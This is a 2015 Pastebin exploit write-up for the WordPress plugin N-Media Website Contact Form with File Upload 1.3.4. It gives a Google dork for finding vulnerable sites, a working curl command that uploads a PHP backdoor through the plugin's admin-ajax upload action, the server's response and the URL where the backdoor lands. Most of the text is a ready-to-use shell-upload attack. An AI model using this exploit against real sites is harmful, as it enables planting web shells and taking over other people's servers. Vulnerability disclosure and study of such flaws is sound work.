Advertisement
Gh0stTrac3

Wordpress N-Media Website Contact Form with File Upload 1.3.

Apr 19th, 2015
424
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. # Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
  2.  
  3. # Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
  4.  
  5. # Dork Google: index of website-contact-form-with-file-upload
  6. index of /uploads/contact_files/
  7.  
  8. # Tested on : Linux BackBox 4.0 / curl 7.35.0
  9.  
  10. #####################
  11.  
  12. # Info :
  13.  
  14. The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
  15.  
  16.  
  17. ######################
  18.  
  19. # PoC:
  20.  
  21. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
  22.  
  23.  
  24. Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
  25.  
  26.  
  27. ######################
  28.  
  29. # Backdoor Location:
  30. http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement